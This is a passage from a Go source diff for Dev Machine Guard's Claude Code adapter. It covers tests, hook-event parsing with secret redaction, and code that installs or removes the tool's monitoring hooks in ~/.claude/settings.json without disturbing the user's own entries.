+ t.Fatalf("second install: %v", err) + } + after, _ := os.ReadFile(settingsPath(home)) + if !bytes.Equal(before, after) { + t.Errorf("idempotent install rewrote settings:\n before %s\n after %s", before, after) + } + matches, _ = filepath.Glob(settingsPath(home) + ".dmg-*.bak") + if len(matches) != beforeBackups { + t.Errorf("idempotent install created a new backup: %v", matches) + } + if len(res.BackupFiles) != 0 || len(res.WrittenFiles) != 0 { + t.Errorf("expected empty file slices on no-op install, got %+v", res) + } +} + +// TestUninstallPreservesUserHookAfterManagedEntry covers an array-shift +// bug in the previous span-based renderer — it matched array elements +// by index, so removing the managed entry at index 0 could overwrite +// the user entry that shifted into index 0. +func TestUninstallPreservesUserHookAfterManagedEntry(t *testing.T) { + body := `{"hooks":{"PreToolUse":[{"matcher":"*","hooks":[{"type":"command","command":"/usr/local/bin/stepsecurity-dev-machine-guard _hook claude-code PreToolUse","timeout":30},{"timeout":5,"type":"command","command":"echo user"}]}]}}` + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + if _, err := a.Uninstall(context.Background()); err != nil { + t.Fatalf("Uninstall: %v", err) + } + out, _ := os.ReadFile(settingsPath(home)) + if !strings.Contains(string(out), `"command": "echo user"`) { + t.Fatalf("user hook after managed entry was lost: %s", out) + } + if isManagedCommand(string(out)) && strings.Contains(string(out), "stepsecurity-dev-machine-guard _hook claude-code") { + t.Fatalf("managed entry survived uninstall: %s", out) + } +} + +// TestInstallOnAlreadyInstalledFileNoFinalNewlineIsNoOp asserts that +// an already-installed settings file without a trailing newline is +// left alone — the previous renderer always appended `\n`, creating a +// pointless backup on every install of an idempotent file. +func TestInstallOnAlreadyInstalledFileNoFinalNewlineIsNoOp(t *testing.T) { + body := `{"hooks":{"PreToolUse":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code PreToolUse","timeout":30}]}],"PostToolUse":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code PostToolUse","timeout":30}]}],"SessionStart":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code SessionStart","timeout":30}]}],"SessionEnd":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code SessionEnd","timeout":30}]}],"UserPromptSubmit":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code UserPromptSubmit","timeout":30}]}],"Stop":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code Stop","timeout":30}]}],"SubagentStop":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code SubagentStop","timeout":30}]}],"Notification":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code Notification","timeout":30}]}],"PostToolUseFailure":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code PostToolUseFailure","timeout":30}]}],"Elicitation":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code Elicitation","timeout":30}]}],"ElicitationResult":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code ElicitationResult","timeout":30}]}],"PermissionRequest":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code PermissionRequest","timeout":30}]}],"PermissionDenied":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code PermissionDenied","timeout":30}]}]}}` + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + before, _ := os.ReadFile(settingsPath(home)) + res, err := a.Install(context.Background()) + if err != nil { + t.Fatal(err) + } + after, _ := os.ReadFile(settingsPath(home)) + if !bytes.Equal(before, after) { + t.Fatalf("no-op install rewrote settings:\n before %s\n after %s", before, after) + } + if len(res.BackupFiles) != 0 { + t.Fatalf("no-op install created backup %v", res.BackupFiles) + } +} + +func TestInstallRejectsMalformedJSON(t *testing.T) { + home := newHomeWithSettings(t, `{not json`) + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err == nil { + t.Fatal("expected error on malformed JSON") + } + // File must remain untouched on parse failure. + out, _ := os.ReadFile(settingsPath(home)) + if string(out) != `{not json` { + t.Fatalf("file was modified despite parse failure: %s", out) + } +} + +// TestInstallRefreshesStaleBinaryPath asserts the self-heal behavior +// for the binary-move case: when settings already contain a managed +// entry pointing at an old absolute path, a fresh `hooks install` +// rewrites the command to the current binaryPath. Without this, +// `brew upgrade` (which relocates the binary in the Cellar) would +// silently break hooks until the user noticed. +func TestInstallRefreshesStaleBinaryPath(t *testing.T) { + stalePath := "/old/path/stepsecurity-dev-machine-guard" + body := `{"hooks":{"PreToolUse":[{"matcher":"*","hooks":[{"type":"command","command":"` + stalePath + ` _hook claude-code PreToolUse","timeout":30}]}]}}` + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + out, _ := os.ReadFile(settingsPath(home)) + if strings.Contains(string(out), stalePath) { + t.Errorf("stale binary path not refreshed: %s", out) + } + if !strings.Contains(string(out), testBinary) { + t.Errorf("new binary path not written: %s", out) + } +} + +func TestDetectReportsPathFromExecutor(t *testing.T) { + home := t.TempDir() + a := New(home, testBinary) + + // Not on $PATH → Detected=false, no error. + mock := executor.NewMock() + res, err := a.Detect(context.Background(), mock) + if err != nil { + t.Fatalf("Detect: %v", err) + } + if res.Detected { + t.Errorf("expected Detected=false when claude not on $PATH") + } + + // On $PATH → Detected=true with BinaryPath populated. + mock.SetPath("claude", "/usr/local/bin/claude") + res, err = a.Detect(context.Background(), mock) + if err != nil { + t.Fatalf("Detect: %v", err) + } + if !res.Detected { + t.Errorf("expected Detected=true when claude on $PATH") + } + if res.BinaryPath != "/usr/local/bin/claude" { + t.Errorf("BinaryPath = %q, want /usr/local/bin/claude", res.BinaryPath) + } +} + +func TestParseEventInfersBashAsCommandExec(t *testing.T) { + a := New(t.TempDir(), testBinary) + raw := []byte(`{"session_id":"s1","cwd":"/tmp","tool_name":"Bash","tool_input":{"command":"echo hi","cwd":"/tmp"}}`) + ev, err := a.ParseEvent(context.Background(), event.HookPreToolUse, raw) + if err != nil { + t.Fatal(err) + } + if ev.ActionType != event.ActionCommandExec { + t.Errorf("action: %s", ev.ActionType) + } + cmd, cwd, ok := a.ShellCommand(ev) + if !ok || cmd == "" || cwd == "" { + t.Errorf("expected shell command extraction") + } +} + +func TestParseEventRedactsSecretsInPayload(t *testing.T) { + a := New(t.TempDir(), testBinary) + raw := []byte(`{"tool_name":"Bash","tool_input":{"command":"GITHUB_TOKEN=ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa make deploy"}}`) + ev, err := a.ParseEvent(context.Background(), event.HookPreToolUse, raw) + if err != nil { + t.Fatal(err) + } + encoded, _ := json.Marshal(ev) + if strings.Contains(string(encoded), "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") { + t.Errorf("event payload still contains secret: %s", encoded) + } +} + +func TestParseEventLifecycleHooksOmitActionType(t *testing.T) { + a := New(t.TempDir(), testBinary) + cases := []event.HookEvent{ + event.HookSessionStart, + event.HookSessionEnd, + event.HookNotification, + event.HookStop, + event.HookSubagentStop, + event.HookUserPrompt, + event.HookElicitation, + event.HookElicitationResult, + event.HookPermissionRequest, + event.HookPermissionDenied, + } + for _, ht := range cases { + t.Run(string(ht), func(t *testing.T) { + ev, err := a.ParseEvent(context.Background(), ht, []byte(`{}`)) + if err != nil { + t.Fatal(err) + } + if ev.ActionType != "" { + t.Errorf("hook %s: expected empty action_type, got %q", ht, ev.ActionType) + } + encoded, _ := json.Marshal(ev) + if strings.Contains(string(encoded), `"action_type"`) { + t.Errorf("hook %s: action_type key must be omitted from JSON, got %s", ht, encoded) + } + }) + } +} + +func TestParseEventScrubsElicitationContent(t *testing.T) { + a := New(t.TempDir(), testBinary) + raw := []byte(`{ + "mcp_server_name":"github", + "action":"accepted", + "content":{"otp":"123456","api_secret":"sk_live_abc","note":"hello"} + }`) + ev, err := a.ParseEvent(context.Background(), event.HookElicitationResult, raw) + if err != nil { + t.Fatal(err) + } + encoded, _ := json.Marshal(ev) + got := string(encoded) + for _, leak := range []string{"123456", "sk_live_abc", `"otp"`, `"api_secret"`, "hello"} { + if strings.Contains(got, leak) { + t.Errorf("content value leaked into payload: %s in %s", leak, got) + } + } + if !strings.Contains(got, `"content_present":true`) { + t.Errorf("expected content_present marker; got %s", got) + } + if !strings.Contains(got, `"action":"accepted"`) { + t.Errorf("action should be preserved; got %s", got) + } +} + +func TestParseEventPreservesUserPromptAndRedactsSecretsInIt(t *testing.T) { + a := New(t.TempDir(), testBinary) + raw := []byte(`{ + "session_id":"s", + "cwd":"/tmp", + "prompt":"deploy the staging service using GITHUB_TOKEN=ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" + }`) + ev, err := a.ParseEvent(context.Background(), event.HookUserPrompt, raw) + if err != nil { + t.Fatal(err) + } + encoded, _ := json.Marshal(ev) + got := string(encoded) + if strings.Contains(got, `"prompt_present"`) { + t.Errorf("prompt must be preserved, not replaced with presence marker: %s", got) + } + prompt, _ := ev.Payload["prompt"].(string) + if !strings.Contains(prompt, "deploy the staging service") { + t.Errorf("user prompt text must survive: %q", prompt) + } + if strings.Contains(got, "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") { + t.Errorf("secret pasted into prompt leaked: %s", got) + } +} + +func TestParseEventCapturesSpecFields(t *testing.T) { + a := New(t.TempDir(), testBinary) + raw := []byte(`{ + "session_id":"s1", + "transcript_path":"/tmp/t.jsonl", + "cwd":"/tmp", + "hook_event_name":"PreToolUse", + "permission_mode":"default", + "tool_name":"Bash", + "tool_use_id":"toolu_01abc", + "tool_input":{"command":"echo hi"} + }`) + ev, err := a.ParseEvent(context.Background(), event.HookPreToolUse, raw) + if err != nil { + t.Fatal(err) + } + if ev.ToolUseID != "toolu_01abc" { + t.Errorf("ToolUseID: %q", ev.ToolUseID) + } + if ev.PermissionMode != "default" { + t.Errorf("PermissionMode: %q", ev.PermissionMode) + } +} + +func TestParseEventHookEventNameMismatchKeepsCLIHookType(t *testing.T) { + a := New(t.TempDir(), testBinary) + raw := []byte(`{"hook_event_name":"PostToolUse","tool_name":"Bash","tool_input":{"command":"echo hi"}}`) + ev, err := a.ParseEvent(context.Background(), event.HookPreToolUse, raw) + if err != nil { + t.Fatal(err) + } + if ev.HookEvent != event.HookPreToolUse { + t.Errorf("HookType should follow CLI arg, got %q", ev.HookEvent) + } + if len(ev.Errors) != 1 || ev.Errors[0].Code != "hook_event_name_mismatch" { + t.Errorf("expected hook_event_name_mismatch error, got %+v", ev.Errors) + } +} + +func TestParseEventPopulatesHookPhase(t *testing.T) { + a := New(t.TempDir(), testBinary) + cases := []struct { + hook event.HookEvent + phase event.HookPhase + }{ + {event.HookPreToolUse, event.HookPhasePreTool}, + {event.HookPostToolUse, event.HookPhasePostTool}, + {event.HookPostToolUseFailure, event.HookPhasePostToolFailure}, + {event.HookPermissionRequest, event.HookPhasePermissionRequest}, + {event.HookPermissionDenied, event.HookPhasePermissionDenied}, + {event.HookElicitation, event.HookPhaseElicitation}, + {event.HookElicitationResult, event.HookPhaseElicitationResult}, + {event.HookUserPrompt, event.HookPhaseUserPrompt}, + {event.HookSessionStart, event.HookPhaseSessionStart}, + {event.HookSessionEnd, event.HookPhaseSessionEnd}, + {event.HookNotification, event.HookPhaseNotification}, + {event.HookStop, event.HookPhaseStop}, + {event.HookSubagentStop, event.HookPhaseSubagentStop}, + } + for _, tc := range cases { + t.Run(string(tc.hook), func(t *testing.T) { + ev, err := a.ParseEvent(context.Background(), tc.hook, []byte(`{}`)) + if err != nil { + t.Fatal(err) + } + if ev.HookPhase != tc.phase { + t.Errorf("hook %s: expected phase %q, got %q", tc.hook, tc.phase, ev.HookPhase) + } + if string(ev.HookEvent) != string(tc.hook) { + t.Errorf("HookEvent must remain native: got %q", ev.HookEvent) + } + }) + } +} + +func TestParseEventPostToolUseFailureSetsErrorStatus(t *testing.T) { + a := New(t.TempDir(), testBinary) + raw := []byte(`{"tool_name":"Bash","tool_input":{"command":"exit 1"},"error":"boom"}`) + ev, err := a.ParseEvent(context.Background(), event.HookPostToolUseFailure, raw) + if err != nil { + t.Fatal(err) + } + if ev.ResultStatus != event.ResultError { + t.Errorf("PostToolUseFailure must set result_status=error, got %q", ev.ResultStatus) + } +} + +func TestDecideResponseAllowShape(t *testing.T) { + a := New(t.TempDir(), testBinary) + resp := a.DecideResponse(&event.Event{HookEvent: event.HookPreToolUse}, adapter.AllowDecision()) + encoded, _ := json.Marshal(resp) + got := string(encoded) + want := `{"continue":true,"suppressOutput":true}` + if got != want { + t.Errorf("allow shape mismatch:\n got %s\n want %s", got, want) + } +} + +func TestDecideResponsePreToolUseBlockShape(t *testing.T) { + a := New(t.TempDir(), testBinary) + ev := &event.Event{HookEvent: event.HookPreToolUse} + resp := a.DecideResponse(ev, adapter.Decision{Allow: false, UserMessage: "Blocked by your organization's administrator."}) + encoded, _ := json.Marshal(resp) + var got map[string]any + if err := json.Unmarshal(encoded, &got); err != nil { + t.Fatal(err) + } + // MUST NOT halt the agent. + if v, ok := got["continue"]; ok && v == false { + t.Errorf("PreToolUse block must not emit continue:false: %s", encoded) + } + // MUST NOT use the deprecated top-level fields. + for _, k := range []string{"decision", "reason", "stopReason"} { + if _, ok := got[k]; ok { + t.Errorf("PreToolUse block must not carry deprecated %q: %s", k, encoded) + } + } + hso, ok := got["hookSpecificOutput"].(map[string]any) + if !ok { + t.Fatalf("missing hookSpecificOutput: %s", encoded) + } + if hso["hookEventName"] != "PreToolUse" { + t.Errorf("hookEventName: %v", hso["hookEventName"]) + } + if hso["permissionDecision"] != "deny" { + t.Errorf("permissionDecision: %v", hso["permissionDecision"]) + } + if hso["permissionDecisionReason"] != "Blocked by your organization's administrator." { + t.Errorf("permissionDecisionReason: %v", hso["permissionDecisionReason"]) + } +} + +func TestDecideResponseDefaultBlockMessage(t *testing.T) { + // The user-visible deny string is "Blocked by your organization's + // administrator." When the runtime passes a Decision with empty + // UserMessage, the adapter must substitute this literal verbatim. + a := New(t.TempDir(), testBinary) + ev := &event.Event{HookEvent: event.HookPreToolUse} + resp := a.DecideResponse(ev, adapter.Decision{Allow: false}) + encoded, _ := json.Marshal(resp) + if !strings.Contains(string(encoded), "Blocked by your organization's administrator.") { + t.Errorf("default deny message missing/changed: %s", encoded) + } +} + +func TestDecideResponseNonPreToolUseBlockNeverHalts(t *testing.T) { + a := New(t.TempDir(), testBinary) + for _, ht := range []event.HookEvent{ + event.HookPostToolUse, event.HookSessionStart, event.HookSessionEnd, + event.HookNotification, event.HookStop, event.HookSubagentStop, + event.HookUserPrompt, event.HookPostToolUseFailure, + } { + resp := a.DecideResponse(&event.Event{HookEvent: ht}, adapter.Decision{Allow: false, UserMessage: "x"}) + encoded, _ := json.Marshal(resp) + var got map[string]any + _ = json.Unmarshal(encoded, &got) + if v, ok := got["continue"]; ok && v == false { + t.Errorf("hook %s: stray block must not emit continue:false: %s", ht, encoded) + } + if _, ok := got["hookSpecificOutput"]; ok { + t.Errorf("hook %s: stray block must not synthesize hookSpecificOutput: %s", ht, encoded) + } + } +} + +func TestDecideResponseNilEventAllows(t *testing.T) { + a := New(t.TempDir(), testBinary) + resp := a.DecideResponse(nil, adapter.Decision{Allow: false, UserMessage: "should be ignored"}) + encoded, _ := json.Marshal(resp) + if string(encoded) != `{"continue":true,"suppressOutput":true}` { + t.Errorf("nil ev must allow, got %s", encoded) + } +} + +func TestInstallWiresPermissionHooks(t *testing.T) { + home := t.TempDir() + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + b, _ := os.ReadFile(settingsPath(home)) + for _, want := range []string{`"PermissionRequest"`, `"PermissionDenied"`} { + if !strings.Contains(string(b), want) { + t.Errorf("settings.json missing %s key: %s", want, b) + } + } +} + +func TestInstallWiresElicitationHooks(t *testing.T) { + home := t.TempDir() + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + b, _ := os.ReadFile(settingsPath(home)) + for _, want := range []string{`"Elicitation"`, `"ElicitationResult"`} { + if !strings.Contains(string(b), want) { + t.Errorf("settings.json missing %s key: %s", want, b) + } + } +} + +func TestInstallWiresPostToolUseFailure(t *testing.T) { + home := t.TempDir() + a := New(home, testBinary) + res, err := a.Install(context.Background()) + if err != nil { + t.Fatal(err) + } + if !slices.Contains(res.HooksAdded, event.HookPostToolUseFailure) { + t.Errorf("expected PostToolUseFailure in HooksAdded: %+v", res.HooksAdded) + } + b, _ := os.ReadFile(settingsPath(home)) + if !strings.Contains(string(b), `"PostToolUseFailure"`) { + t.Errorf("settings.json missing PostToolUseFailure key: %s", b) + } +} + +// TestInstallCreatesParentDirWhenAbsent asserts that Install can run +// against a fresh home without ~/.claude/ existing — the atomicfile +// layer creates parent dirs and reports them in CreatedDirs so the +// install handler can chown them under root. +func TestInstallCreatesParentDirWhenAbsent(t *testing.T) { + home := t.TempDir() + a := New(home, testBinary) + res, err := a.Install(context.Background()) + if err != nil { + t.Fatalf("Install: %v", err) + } + if _, statErr := os.Stat(filepath.Join(home, ".claude")); statErr != nil { + t.Errorf("~/.claude/ not created: %v", statErr) + } + if _, statErr := os.Stat(settingsPath(home)); statErr != nil { + t.Errorf("settings.json not created: %v", statErr) + } + // CreatedDirs must include ~/.claude so the install handler can + // chown it under root. + wantDir := filepath.Join(home, ".claude") + if !slices.Contains(res.CreatedDirs, wantDir) { + t.Errorf("CreatedDirs missing %q: got %v", wantDir, res.CreatedDirs) + } +} diff --git a/internal/aiagents/adapter/claudecode/hooks.go b/internal/aiagents/adapter/claudecode/hooks.go new file mode 100644 index 0000000..693759e --- /dev/null +++ b/internal/aiagents/adapter/claudecode/hooks.go @@ -0,0 +1,33 @@ +package claudecode + +import "github.com/step-security/dev-machine-guard/internal/aiagents/event" + +// supportedHookEvents enumerates the Claude Code hook events DMG wires +// up. Order is significant for install/uninstall reproducibility — +// append, do not insert. This list is the single source of truth for +// what `hooks install --agent claude-code` writes into +// ~/.claude/settings.json. +var supportedHookEvents = []event.HookEvent{ + event.HookPreToolUse, + event.HookPostToolUse, + event.HookSessionStart, + event.HookSessionEnd, + event.HookUserPrompt, + event.HookStop, + event.HookSubagentStop, + event.HookNotification, + event.HookPostToolUseFailure, + event.HookElicitation, + event.HookElicitationResult, + event.HookPermissionRequest, + event.HookPermissionDenied, +} + +// SupportedHooks returns a fresh copy of the Claude-supported hook list. +// Callers may freely mutate the returned slice without affecting adapter +// internals. +func (a *Adapter) SupportedHooks() []event.HookEvent { + out := make([]event.HookEvent, len(supportedHookEvents)) + copy(out, supportedHookEvents) + return out +} diff --git a/internal/aiagents/adapter/claudecode/parse.go b/internal/aiagents/adapter/claudecode/parse.go new file mode 100644 index 0000000..046cd54 --- /dev/null +++ b/internal/aiagents/adapter/claudecode/parse.go @@ -0,0 +1,227 @@ +package claudecode + +import ( + "context" + "encoding/json" + "fmt" + "strings" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/aiagents/redact" +) + +// ParseEvent normalizes a Claude Code hook stdin payload into an event. +// The raw payload is REDACTED before being attached to the result; the +// original bytes never appear in the returned event. +func (a *Adapter) ParseEvent(ctx context.Context, hookType event.HookEvent, raw []byte) (*event.Event, error) { + var generic map[string]any + if err := json.Unmarshal(raw, &generic); err != nil { + return nil, fmt.Errorf("claudecode parse: %w", err) + } + if generic == nil { + generic = map[string]any{} + } + + ev := &event.Event{ + SchemaVersion: event.SchemaVersion, + EventID: event.NewEventID(), + Timestamp: time.Now().UTC(), + AgentName: AgentName, + HookEvent: hookType, + HookPhase: phaseFor(hookType), + ResultStatus: event.ResultObserved, + } + + // Spec-documented fields only. Names match + // https://code.claude.com/docs/en/hooks.md verbatim. + ev.SessionID = stringField(generic, "session_id") + ev.WorkingDirectory = stringField(generic, "cwd") + ev.ToolName = stringField(generic, "tool_name") + ev.ToolUseID = stringField(generic, "tool_use_id") + ev.PermissionMode = stringField(generic, "permission_mode") + + // Cross-check: the CLI arg names which hook command Claude invoked. + // On disagreement, keep runtime behavior tied to that hook and record + // the payload mismatch for audit. The payload claim is not persisted + // as a field of its own — ev.HookEvent is the single source of truth, + // and the mismatch annotation captures the disagreement. + if claimed := stringField(generic, "hook_event_name"); claimed != "" && claimed != string(hookType) { + ev.Errors = append(ev.Errors, event.ErrorInfo{ + Stage: "parse", + Code: "hook_event_name_mismatch", + Message: "cli arg=" + string(hookType) + " payload=" + claimed, + }) + } + + ev.ActionType = inferActionType(ev.HookEvent, ev.ToolName, generic) + + // PostToolUseFailure means the tool already failed; record the + // canonical error status so downstream readers don't have to peek + // inside the payload to learn the outcome. + if ev.HookEvent == event.HookPostToolUseFailure { + ev.ResultStatus = event.ResultError + } + + // Attach a redacted view of the payload. Drop high-volume transcript + // fields by default — they may be re-attached later by an enrichment. + cleaned := scrubPayload(generic) + ev.Payload = redact.Value(cleaned).(map[string]any) + + ev.IsSensitive = isSensitivePayload(generic) + + return ev, nil +} + +// scrubPayload removes payload fields whose values are either too bulky +// to embed in a record or too unstructured for the key-based redactor +// to handle safely: +// +// - transcript / messages: full chat history; can be many MB. +// - stdout / stderr: tool output; potentially huge and noisy. +// - content: ElicitationResult form-response field. Form values are +// user-defined and may carry OTPs, credentials, or other secrets +// under arbitrary key names the general redactor will not catch. +// +// Each is replaced with a `_present: true` marker. The user's +// prompt (UserPromptSubmit.payload.prompt) is deliberately NOT scrubbed: +// it IS the audit evidence for that hook event, and the standard +// redactor still walks the value to scrub any secrets pasted into it. +func scrubPayload(p map[string]any) map[string]any { + out := make(map[string]any, len(p)) + for k, v := range p { + switch strings.ToLower(k) { + case "transcript", "messages", "stdout", "stderr", "content": + out[k+"_present"] = true + case "transcript_path": + // Path is fine; full transcript scanning happens via the secret + // scanner enrichment with bounded reads. + out[k] = v + default: + out[k] = v + } + } + return out +} + +// inferActionType classifies the operation a tool-bearing hook is about +// to perform (PreToolUse) or just performed (PostToolUse, +// PostToolUseFailure). Lifecycle hooks (SessionStart, SessionEnd, +// Notification, Stop, SubagentStop, UserPromptSubmit) return "" — the +// hook_event field already names the lifecycle phase, so action_type +// is omitted in those records. +func inferActionType(hookEvent event.HookEvent, toolName string, p map[string]any) event.ActionType { + switch hookEvent { + case event.HookPreToolUse, event.HookPostToolUse, event.HookPostToolUseFailure: + // fall through to tool-name routing + default: + return "" + } + switch strings.ToLower(toolName) { + case "bash", "shell": + return event.ActionCommandExec + case "read": + return event.ActionFileRead + case "write", "edit", "multiedit": + return event.ActionFileWrite + case "webfetch", "websearch", "http": + return event.ActionNetworkRequest + case "": + // Some hook payloads carry the command nested under tool_input. + if hasShellCommand(p) { + return event.ActionCommandExec + } + return "" + default: + if strings.HasPrefix(strings.ToLower(toolName), "mcp__") { + return event.ActionMCPInvocation + } + return event.ActionToolUse + } +} + +func hasShellCommand(p map[string]any) bool { + ti, ok := p["tool_input"].(map[string]any) + if !ok { + return false + } + if _, ok := ti["command"].(string); ok { + return true + } + return false +} + +// ShellCommand extracts the redacted shell command from a Claude Code +// hook payload, if any. Returns the empty string when no shell command +// is present. The result has already been redacted. +func (a *Adapter) ShellCommand(ev *event.Event) (cmd string, cwd string, ok bool) { + if ev == nil || ev.Payload == nil { + return "", "", false + } + ti, ok := ev.Payload["tool_input"].(map[string]any) + if !ok { + return "", ev.WorkingDirectory, false + } + c, ok := ti["command"].(string) + if !ok || c == "" { + return "", ev.WorkingDirectory, false + } + wd, _ := ti["cwd"].(string) + if wd == "" { + wd = ev.WorkingDirectory + } + return c, wd, true +} + +func isSensitivePayload(p map[string]any) bool { + ti, ok := p["tool_input"].(map[string]any) + if !ok { + return false + } + for _, key := range []string{"file_path", "path", "filename"} { + if v, ok := ti[key].(string); ok && redact.IsSensitivePath(v) { + return true + } + } + return false +} + +func stringField(m map[string]any, k string) string { + v, _ := m[k].(string) + return v +} + +// phaseFor maps a Claude Code native hook event onto the normalized +// hook phase. Cross-agent consumers (policy, filtering) branch on +// phase; agent-specific consumers may still inspect HookEvent. +func phaseFor(h event.HookEvent) event.HookPhase { + switch h { + case event.HookPreToolUse: + return event.HookPhasePreTool + case event.HookPostToolUse: + return event.HookPhasePostTool + case event.HookPostToolUseFailure: + return event.HookPhasePostToolFailure + case event.HookPermissionRequest: + return event.HookPhasePermissionRequest + case event.HookPermissionDenied: + return event.HookPhasePermissionDenied + case event.HookElicitation: + return event.HookPhaseElicitation + case event.HookElicitationResult: + return event.HookPhaseElicitationResult + case event.HookUserPrompt: + return event.HookPhaseUserPrompt + case event.HookSessionStart: + return event.HookPhaseSessionStart + case event.HookSessionEnd: + return event.HookPhaseSessionEnd + case event.HookNotification: + return event.HookPhaseNotification + case event.HookStop: + return event.HookPhaseStop + case event.HookSubagentStop: + return event.HookPhaseSubagentStop + } + return event.HookPhaseUnknown +} diff --git a/internal/aiagents/adapter/claudecode/settings.go b/internal/aiagents/adapter/claudecode/settings.go new file mode 100644 index 0000000..36e713b --- /dev/null +++ b/internal/aiagents/adapter/claudecode/settings.go @@ -0,0 +1,359 @@ +package claudecode + +import ( + "bytes" + "encoding/json" + "errors" + "fmt" + "io/fs" + "os" + "regexp" + "slices" + + "github.com/tidwall/gjson" + "github.com/tidwall/pretty" + "github.com/tidwall/sjson" + + "github.com/step-security/dev-machine-guard/internal/aiagents/atomicfile" + "github.com/step-security/dev-machine-guard/internal/aiagents/configedit" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" +) + +// settingsDoc holds raw bytes for ~/.claude/settings.json. orig is the +// bytes as read from disk (nil if the file did not exist); json is the +// in-memory mutation buffer that starts equal to orig (or `{}` for +// missing/empty input). All edits go through tidwall/sjson so that +// unrelated user formatting is preserved byte-for-byte. +// +// Hooks have this shape per Claude Code docs: +// +// "hooks": { +// "PreToolUse": [ +// { +// "matcher": "*", +// "hooks": [ +// {"type": "command", "command": "...", "timeout": 30} +// ] +// } +// ] +// } +type settingsDoc struct { + orig []byte + json []byte +} + +const ( + hookTimeoutSeconds = 30 + matcherAll = "*" +) + +// settingsMode is the default mode for ~/.claude/settings.json. The +// atomicfile helpers preserve a tighter existing mode if present. +const settingsMode = os.FileMode(0o600) + +// managedCmdRE is the uninstall match criterion. It matches +// an entry's `command` field when the executable token is the DMG +// binary, regardless of which absolute path it sits behind. The +// `(^|/)` left-side accepts both bare invocations and absolute-path +// invocations, while rejecting prefix collisions like +// `mystepsecurity-dev-machine-guard`. +var managedCmdRE = regexp.MustCompile(`(^|/)stepsecurity-dev-machine-guard\s+_hook\s+`) + +func loadSettings(path string) (*settingsDoc, error) { + b, err := os.ReadFile(path) + if err != nil { + if errors.Is(err, fs.ErrNotExist) { + return &settingsDoc{json: []byte(`{}`)}, nil + } + return nil, fmt.Errorf("claude settings read: %w", err) + } + normalized, err := configedit.NormalizeJSONObject(b) + if err != nil { + return nil, fmt.Errorf("claude settings parse: %w", err) + } + return &settingsDoc{orig: b, json: normalized}, nil +} + +func hookEventPath(hookType event.HookEvent) string { + return configedit.Path("hooks", string(hookType)) +} + +// hookEntry is the inner record we install. DMG entries are identified +// on uninstall by the regex `managedCmdRE` matching the command +// field, not by a metadata marker. +type hookEntry struct { + Type string `json:"type"` + Command string `json:"command"` + Timeout int `json:"timeout,omitempty"` +} + +func installEntry(command string) hookEntry { + return hookEntry{ + Type: "command", + Command: command, + Timeout: hookTimeoutSeconds, + } +} + +// isManagedCommand reports whether cmd is a DMG-installed hook entry. +// It explicitly does NOT match legacy hook entries left by other tools. +func isManagedCommand(cmd string) bool { + return managedCmdRE.MatchString(cmd) +} + +// upsertHook adds or refreshes the DMG matcher entry for one hook +// type while preserving every unrelated user matcher and inner hook. +// When the desired entry is already in place, the JSON document bytes +// are not touched at all so a re-install on a pretty-printed file does +// not collapse formatting. +// +// command is the literal string to write into the entry's `command` +// field — the adapter computes it via a.commandFor(hookType) so the +// settings document never embeds the binary path resolution logic. +func (s *settingsDoc) upsertHook(hookType event.HookEvent, command string) (added bool) { + want := installEntry(command) + wantRaw, err := configedit.MarshalRawJSON(want) + if err != nil { + return false + } + path := hookEventPath(hookType) + list := gjson.GetBytes(s.json, path).Array() + + outGroups := make([]string, 0, len(list)+1) + placed := false + listChanged := false + + for _, group := range list { + if !group.IsObject() { + outGroups = append(outGroups, group.Raw) + continue + } + matcher := group.Get("matcher").String() + inner := group.Get("hooks").Array() + + filteredInner := make([]string, 0, len(inner)+1) + innerChanged := false + for _, h := range inner { + if !h.IsObject() { + filteredInner = append(filteredInner, h.Raw) + continue + } + cmd := h.Get("command").String() + if isManagedCommand(cmd) { + refreshed, err := refreshManagedEntry(h.Raw, want) + if err != nil { + return false + } + if refreshed != h.Raw { + innerChanged = true + } + filteredInner = append(filteredInner, refreshed) + placed = true + continue + } + filteredInner = append(filteredInner, h.Raw) + } + if matcher == matcherAll && !placed { + filteredInner = append(filteredInner, wantRaw) + placed = true + innerChanged = true + } + if len(filteredInner) == 0 { + listChanged = true + continue + } + if !innerChanged { + outGroups = append(outGroups, group.Raw) + continue + } + updated, err := sjson.SetRawBytes([]byte(group.Raw), "hooks", []byte(configedit.RawArray(filteredInner))) + if err != nil { + return false + } + outGroups = append(outGroups, string(updated)) + listChanged = true + } + + if !placed { + newGroup := struct { + Matcher string `json:"matcher"` + Hooks []hookEntry `json:"hooks"` + }{Matcher: matcherAll, Hooks: []hookEntry{want}} + raw, err := configedit.MarshalRawJSON(newGroup) + if err != nil { + return false + } + outGroups = append(outGroups, raw) + added = true + listChanged = true + } + + if !listChanged { + return added + } + + patched, err := configedit.SetRaw(s.json, 